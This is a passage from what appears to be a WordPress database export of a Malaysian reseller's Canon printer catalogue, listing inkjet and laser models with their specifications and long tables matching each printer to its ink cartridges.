width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS9570</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr></tbody></table>','Canon','','inherit','closed','closed','','1449-revision-v1','','','2019-09-25 10:13:39','2019-09-25 02:13:39','',1449,'https://bintara.com.my/blog/2019/09/25/1449-revision-v1/',0,'revision','',0),(3330,1,'2019-09-25 10:07:50','2019-09-25 02:07:50','<h2>Injet Printers :-</h2>		\n			<h4>PIXMA E560 / E560R</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Advanced Wireless All-In-One with Auto DuplexÂ Printing for Low-Cost Printing</p><p>The Ink Efficient E560 / E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.</p><p>Available in Black and Red.</p><p>Print, Scan, Copy</p><p>ISO Standard print speed (A4): up to 9.9ipm black / 5.7ipm colour</p><p>Hi-speed USB 2.0, WiFi</p><p>Recommended print volume: 80 - 400 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA E4270</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing</p><p>This compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.</p><p>Print, Scan, Copy, Fax</p><p>ISO standard print speed (A4): 8.8ipm black / 4.4ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct</p><p>Recommended print volume: 50 - 200 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA TS9570</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>A3 Wireless Photo Printer with Large 4.3â€ Touch-Screen and Auto Document Feeder</p><p>This A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.</p><p>Print, Scan, Copy</p><p>ISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct</p><p>Recommended print volume: 80 - 300 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA TS8270</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Wireless Photo All-In-One with Large 4.3â€ Touch-Screen and Auto Duplex Printing</p><p>This advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.</p><p>Available in Black, Red and White.</p><p>Print, Scan, Copy</p><p>ISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct</p><p>Recommended print volume: 30 - 100 pages</p><center></center><center></center><center></center><center></center><center></center><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G2010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print, Scan &amp; Copy</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0</p><p>Recommended print volume: 150 - 1500 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G4010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost.</p><p>Print, Scan, Copy and Fax</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode</p><p>Recommended print volume: 150 - 1500 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G1010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank Printer for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print</p><p>ISO Standard print speed (A4): up to 8.8ipm (mono) / 5.0ipm (colour)</p><p>Photo Speed (4 x 6\"): 60sec. (borderless)</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G3010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank Wireless All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print, Scan &amp; Copy</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, Access Point Mode</p><p>Recommended print volume: 150 - 1500 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h2>Laser Printers :-</h2>		\n			<h4>imageCLASS LBP113w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact with wireless connectivity</strong></p><p>Simple to operate and compact in size, the ideal choice for your printing needs.</p><ul><li>Print</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>First Print Out Time (A4): Approx. 6.5 sec</li><li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li><li>Mobile Connectivity.</li></ul><center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF269dw</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>The Multifunction printing solution with Duplex Auto Document Feeder (DADF)</strong></p>\nEnjoy greater efficiency. With the duplex auto document feeder, ensure shorter copying and scanning times.\n<ul>\n 	<li>Print, Scan, Copy, Fax</li>\n 	<li>Print Speed (A4): Up to 28ppm</li>\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\n 	<li>FPOT: Approx. 5.2 sec</li>\n 	<li>Max. paper input capacity: 251 sheets</li>\n 	<li>Print resolution: 1,200 Ã— 1,200 dpi (equivalent)</li>\n</ul><center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF266dn</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>The Multifunction printing solution with Mobile Printing and Network</strong></p>\nFeaturing Network printing and SEND technology, MF266dn is the productive choice for your business operations.\n<ul>\n 	<li>Print, Scan, Copy, Fax</li>\n 	<li>Print Speed (A4): Up to 28ppm</li>\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\n 	<li>FPOT: Approx. 5.2 sec</li>\n 	<li>Max. paper input capacity: 251 sheets</li>\n 	<li>Print resolution: 1,200 Ã— 1,200 dpi (equivalent)</li>\n</ul><center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF913w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>Compact All-in-One with wireless connectivity, bundled with three toner cartridges</strong></p>\nSimple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.\n<ul>\n 	<li>Print, Scan, Copy</li>\n 	<li>Print Speed (A4): Up to 22ppm</li>\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\n 	<li>FPOT: Approx. 6.5 sec</li>\n 	<li>Max. paper input capacity: Up to 150 sheets</li>\n 	<li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li>\n</ul>\n<center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF113w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>Compact All-in-One with wireless connectivity</strong></p>\nSimple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Equipped with built-in Wi-Fi and access point capability.\n<ul>\n 	<li>Print, Scan, Copy</li>\n 	<li>Print Speed (A4): Up to 22ppm</li>\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\n 	<li>FPOT: Approx. 6.5 sec</li>\n 	<li>Max. paper input capacity: Up to 150 sheets</li>\n 	<li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li>\n</ul>\n<center>[maxbutton id=\"11\" ]</center>\n			<h4>imageCLASS LBP913w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>Compact with wireless connectivity, bundled with 3 cartridges</strong></p>\nKeep printing simple. The compact size fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.\n<ul>\n 	<li>Print</li>\n 	<li>Print Speed (A4): Up to 22ppm</li>\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\n 	<li>First Print Out Time (A4): Approx. 6.5 sec</li>\n 	<li>Print Resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li>\n 	<li>Mobile Printing</li>\n</ul><center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF525x</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\nSmarter way to improve office productivity and work efficiency. Equipped with innovative solution in a robust, compact design, the MF525x integrates seamlessly into busy offices and workgroups.\n<ul>\n 	<li>Print, Scan, Copy, Fax</li>\n 	<li>Print Speed (A4): Up to 43ppm</li>\n 	<li>Recommended monthly print volume: 2,000 - 7,500 pages</li>\n 	<li>FPOT: 6.2secs. (A4)</li>\n 	<li>Max. paper input capacity: Up to 2,300 sheets</li>\n 	<li>Print Resolution: Up to 1200 x 1200dpi (equivalent)</li>\n</ul>\n<center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF426dw</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>Compact 4-in-1 Black and White Multifunction for the smart business</strong></p>\nWith cutting-edge features, the MF426dw is set to boost work productivity in the modern office.\n<ul>\n 	<li>Print, Scan, Copy, Fax</li>\n 	<li>Print Speed (A4): Up to 38ppm</li>\n 	<li>Recommended monthly print volume: 750 - 4,000 pages</li>\n 	<li>FPOT: 5.5secs. (A4)</li>\n 	<li>Max. paper input capacity: Up to 900 sheets</li>\n 	<li>Print Resolution: Up to 1200 x 1200dpi (equivalent)</li>\n</ul>\n<center>[maxbutton id=\"11\" ]</center>		\n			<h2>Cartridge Printers :-</h2>		\n		<table border=\"1\" width=\"378\">\n<tbody>\n<tr align=\"center\">\n<td width=\"170\"><strong>Model</strong></td>\n<td width=\"208\"><strong>Cartridge / Bottle</strong></td>\n</tr>\n<tr>\n<td rowspan=\"13\" align=\"center\">imagePROGRAF PRO-500</td>\n<td>Maintenance Cartridge MC-20</td>\n</tr>\n<tr>\n<td>PFI-50 (Blue)</td>\n</tr>\n<tr>\n<td>PFI-50 (Chroma Optimizer)</td>\n</tr>\n<tr>\n<td>PFI-50 (Cyan)</td>\n</tr>\n<tr>\n<td>PFI-50 (Gray)</td>\n</tr>\n<tr>\n<td>PFI-50 (Magenta)</td>\n</tr>\n<tr>\n<td>PFI-50 (Matte Black)</td>\n</tr>\n<tr>\n<td>PFI-50 (Photo Black)</td>\n</tr>\n<tr>\n<td>PFI-50 (Photo Cyan)</td>\n</tr>\n<tr>\n<td>PFI-50 (Photo Gray)</td>\n</tr>\n<tr>\n<td>PFI-50 (Photo Magenta)</td>\n</tr>\n<tr>\n<td>PFI-50 (Red)</td>\n</tr>\n<tr>\n<td>PFI-50 (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"8\" align=\"center\">MAXIFY iB4170</td>\n<td>PGI-2700 (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"8\" align=\"center\">MAXIFY MB5070</td>\n<td>PGI-2700 (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"8\" align=\"center\">MAXIFY MB5170</td>\n<td>PGI-2700 (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"8\" align=\"center\">MAXIFY MB5370</td>\n<td>PGI-2700 (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"8\" align=\"center\">MAXIFY MB5470</td>\n<td>PGI-2700 (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Black)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Cyan)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Magenta)</td>\n</tr>\n<tr>\n<td>PGI-2700XL (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"3\" align=\"center\">PIXMA E3170</td>\n<td>CL-57 (Colour)</td>\n</tr>\n<tr>\n<td>CL-57S (Colour)</td>\n</tr>\n<tr>\n<td>PG-47 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"3\" align=\"center\">PIXMA E410</td>\n<td>CL-57 (Colour)</td>\n</tr>\n<tr>\n<td>CL-57S (Colour)</td>\n</tr>\n<tr>\n<td>PG-47 (Pigment Black)</td>\n</tr>\n</tbody>\n</table><table border=\"1\" width=\"378\" cellpadding=\"10\">\n<tbody>\n<tr align=\"center\">\n<td width=\"170\"><strong>Model</strong></td>\n<td width=\"208\"><strong>Cartridge / Bottle</strong></td>\n</tr>\n<tr>\n<td rowspan=\"3\" align=\"center\">PIXMA E4270</td>\n<td>CL-57 (Colour)</td>\n</tr>\n<tr>\n<td>CL-57S (Colour)</td>\n</tr>\n<tr>\n<td>PG-47 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"3\" align=\"center\">PIXMA E470</td>\n<td>CL-57 (Colour)</td>\n</tr>\n<tr>\n<td>CL-57S (Colour)</td>\n</tr>\n<tr>\n<td>PG-47 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"2\" align=\"center\">PIXMA E477</td>\n<td>CL-57S (Colour)</td>\n</tr>\n<tr>\n<td>PG-47 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"2\" align=\"center\">PIXMA E480</td>\n<td>CL-57 (Colour)</td>\n</tr>\n<tr>\n<td>PG-47 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"2\" align=\"center\">PIXMA E510</td>\n<td>CL-98 (Colour)</td>\n</tr>\n<tr>\n<td>PG-88 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"2\" align=\"center\">PIXMA E560</td>\n<td>CL-99 (Colour)</td>\n</tr>\n<tr>\n<td>PG-89 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"2\" align=\"center\">PIXMA E560 / E560R</td>\n<td>CL-99 (Colour)</td>\n</tr>\n<tr>\n<td>PG-89 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"4\" align=\"center\">PIXMA G1000</td>\n<td>GI-790 (Black)</td>\n</tr>\n<tr>\n<td>GI-790 (Cyan)</td>\n</tr>\n<tr>\n<td>GI-790 (Magenta)</td>\n</tr>\n<tr>\n<td>GI-790 (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"4\" align=\"center\">PIXMA G1010</td>\n<td>GI-790 (Black)</td>\n</tr>\n<tr>\n<td>GI-790 (Cyan)</td>\n</tr>\n<tr>\n<td>GI-790 (Magenta)</td>\n</tr>\n<tr>\n<td>GI-790 (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"4\" align=\"center\">PIXMA G2010</td>\n<td>GI-790 (Black)</td>\n</tr>\n<tr>\n<td>GI-790 (Cyan)</td>\n</tr>\n<tr>\n<td>GI-790 (Magenta)</td>\n</tr>\n<tr>\n<td>GI-790 (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"4\" align=\"center\">PIXMA G3000</td>\n<td>GI-790 (Black)</td>\n</tr>\n<tr>\n<td>GI-790 (Cyan)</td>\n</tr>\n<tr>\n<td>GI-790 (Magenta)</td>\n</tr>\n<tr>\n<td>GI-790 (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"4\" align=\"center\">PIXMA G3010</td>\n<td>GI-790 (Black)</td>\n</tr>\n<tr>\n<td>GI-790 (Cyan)</td>\n</tr>\n<tr>\n<td>GI-790 (Magenta)</td>\n</tr>\n<tr>\n<td>GI-790 (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"4\" align=\"center\">PIXMA G4010</td>\n<td>GI-790 (Black)</td>\n</tr>\n<tr>\n<td>GI-790 (Cyan)</td>\n</tr>\n<tr>\n<td>GI-790 (Magenta)</td>\n</tr>\n<tr>\n<td>GI-790 (Yellow)</td>\n</tr>\n<tr>\n<td rowspan=\"2\" align=\"center\">PIXMA iP100</td>\n<td>CLI-36 (Colour)</td>\n</tr>\n<tr>\n<td>PGI-35 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"2\" align=\"center\">PIXMA iP110</td>\n<td>CLI-36 (Colour)</td>\n</tr>\n<tr>\n<td>PGI-35 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"2\" align=\"center\">PIXMA iP110 (with battery)</td>\n<td>CLI-36 (Colour)</td>\n</tr>\n<tr>\n<td>PGI-35 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"3\" align=\"center\">PIXMA iP1300</td>\n<td>CL-41 (Colour)</td>\n</tr>\n<tr>\n<td>PG-40 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-40/CL-41 Value Pack</td>\n</tr>\n<tr>\n<td rowspan=\"6\" align=\"center\">PIXMA iP2770 / iP2772</td>\n<td>CL-811 (Colour)</td>\n</tr>\n<tr>\n<td>CL-811XL (Colour)</td>\n</tr>\n<tr>\n<td>PG-810 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-810 Twin Pack</td>\n</tr>\n<tr>\n<td>PG-810/CL-811 Value Pack</td>\n</tr>\n<tr>\n<td>PG-810XL (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"4\" align=\"center\">PIXMA iP2870S</td>\n<td>CL-746 (Colour)</td>\n</tr>\n<tr>\n<td>CL-746S (Colour)</td>\n</tr>\n<tr>\n<td>PG-745 (Pigment Black)</td>\n</tr>\n<tr>\n<td>PG-745S (Pigment Black)</td>\n</tr>\n</tbody>\n</table><table border=\"1\" width=\"378\" cellpadding=\"10\">\n<tbody>\n<tr align=\"center\">\n<td width=\"170\"><strong>Model</strong></td>\n<td width=\"208\"><strong>Cartridge / Bottle</strong></td>\n</tr>\n<tr>\n<td rowspan=\"5\" align=\"center\">PIXMA iP4200</td>\n<td>CLI-8 (Black)</td>\n</tr>\n<tr>\n<td>CLI-8 (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-8 (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-8 (Yellow)</td>\n</tr>\n<tr>\n<td>PGI-5 (Pigment Black)</td>\n</tr>\n<tr>\n<td rowspan=\"10\" align=\"center\">PIXMA iP7270</td>\n<td>CLI-751 (Black)</td>\n</tr>\n<tr>\n<td>CLI-751 (Cyan)</td>\n</tr>\n<tr>\n<td>CLI-751 (Magenta)</td>\n</tr>\n<tr>\n<td>CLI-751 (Yellow)</td>\n</tr>\n<tr>\n<td>CLI-751XL 